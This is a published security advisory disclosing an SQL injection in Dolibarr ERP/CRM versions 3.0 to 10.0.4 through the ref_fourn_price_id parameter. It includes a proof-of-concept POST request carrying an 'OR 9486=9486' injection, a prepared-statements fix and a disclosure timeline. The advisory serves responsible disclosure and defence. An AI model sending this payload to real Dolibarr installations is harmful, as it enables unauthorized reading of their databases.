usd-2019-0067 | Dolibarr ERP/CRM ver. 3.0 – 10.0.4


Advisory ID: usd-2019-0067
CVE Number: Pending
Affected Product: Dolibarr ERP/CRM
Affected Version: 3.0 – 10.0.4
Vulnerability Type: SQL injection
Security Risk: High
Vendor URL: https://www.dolibarr.org/
Vendor Status: Fixed (not verified)

Description

It is possible to execute arbitrary SQL commands by manipulating the ref_fourn_price_id parameter while editing the price of a product, used by /dolibarr/htdocs/product/fournisseurs.php

Proof of Concept (PoC)

The following request can be used to read the current database user:

POST /dolibarr/htdocs/product/fournisseurs.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-DE
Accept-Encoding: gzip, deflate
Referer: http://localhost/dolibarr/htdocs/product/fournisseurs.php?id=1&action=add_price
Content-Type: application/x-www-form-urlencoded
Content-Length: 494
Cookie: DOLSESSID_d62fd6e735d72194222ef3c6d1021d7a=hltic273b6m378p7a1qrqf1b2d
Connection: close
Upgrade-Insecure-Requests: 1

token=$2y$10$TZJzw/3dPdYxPhcc.H1gF.JSduPMJyndwzgx1Bc7Wsd7XSGmOvgMe&action=updateprice&id_fourn=1&ref_fourn=1234&qty=1&tva_tx=0&price=123&price_base_type=HT&remise_percent=&delivery_time_days=&supplier_reputation=-1&ref_fourn_price_id=-2209 OR 9486=9486

Fix

It is recommended to use prepared statements. Building the SQL query by hand is always more prone to errors which lead to vulnerabilities. Furthermore, a blacklist attempt to filter user input is not recommend due to its complexity.

Timeline

  • 2019-11-06 Vulnerability discovered by Daniel Hoffmann
  • 2019-11-13 First contact with vendor
  • 2019-11-27 Vendor released version 10.0.4 which fixes the vulnerability (not verified)
  • 2020-02-05 Security advisory released

Credits

This security vulnerability was discovered by Daniel Hoffmann of usd AG.